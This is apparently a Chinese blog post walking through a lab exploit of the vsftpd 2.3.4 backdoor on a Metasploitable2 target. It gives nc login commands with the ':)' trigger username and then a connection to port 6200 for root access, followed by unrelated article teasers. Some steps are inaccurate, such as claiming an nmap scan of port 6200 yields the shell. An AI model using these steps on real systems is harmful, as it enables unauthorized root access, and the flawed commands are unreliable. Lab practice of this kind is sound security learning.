张小明
前端开发工程师
一、实验准备:
1、Metaspolitable2(靶机)
2、kali
二、实验步骤:
1、打开kali和靶机,两者都要处于NAT模式
2、在终端使用命令(ip addr)查看kali的ip 然后nmap+kali IP,得到靶机ip
3、执行nmap -sV +(靶机IP)得到端口服务信息
4.手动模拟FTP登录,nc 192.168.61.130 21 回车后输入FTP用户名USER 1:),回车输入密码PASS 123,然后就可以crtl+C退出当前nc连接,注意:用户名一定要带有“:)”这个是触发笑脸漏洞的关键,密码任意都行。
5、nmap 192.168.61.130 -p 6200就可以连接到靶机的后门,拿到root权限。
三、正式的NSE-nmap脚本
针对VSFTPD v2.3.4的检测脚本它的方法为--script加上脚本名即nmap --script ftp-vsftpd-backdoor 192.168.61.130
本文只做分享,不做它用
Dify平台能否用于招聘面试?AI考官系统开发实践 在企业HR部门的某个清晨,一位招聘专员正对着屏幕上的第37份简历发愁——这已经是她今天第三次看到“精通Python、熟悉Django和Flask”的描述了。如何快速判断谁是真高手、谁只是关键词堆砌?传统…
李华
Dify平台在竞品分析报告自动生成中的效率优势深度解析 在企业竞争日益激烈的今天,市场团队常常面临一个棘手问题:如何在极短时间内产出一份数据翔实、逻辑清晰的竞品分析报告?传统方式下,分析师需要手动收集财报、新闻稿、产品文档…
李华
Poppler Windows版:5分钟搭建专业PDF处理环境的完整指南 【免费下载链接】poppler-windows Download Poppler binaries packaged for Windows with dependencies 项目地址: https://gitcode.com/gh_mirrors/po/poppler-windows Poppler Windows版是一个专为W…
李华
小红书数据采集神器:零基础也能轻松上手的完整解决方案 【免费下载链接】xhs 基于小红书 Web 端进行的请求封装。https://reajason.github.io/xhs/ 项目地址: https://gitcode.com/gh_mirrors/xh/xhs 还在为获取小红书公开数据而头痛不已吗?面对海…
李华
电源稳压电路实战指南:从LDO到开关电源的系统设计思维你有没有遇到过这样的情况?一个精心设计的传感器采集板,ADC读数总是“跳码”;或者MCU偶尔莫名其妙重启,示波器一测才发现核心电压在负载突变时跌落了300mV…
李华
MicroPython 网络调试实战:从连不上 Wi-Fi 到远程交互全搞定你有没有过这样的经历?代码烧录成功,板子通电启动,串口输出却卡在“正在连接 Wi-Fi…”那一行,十几个点打完也没连上。重启、换路由器、检查密码——全都试了…
李华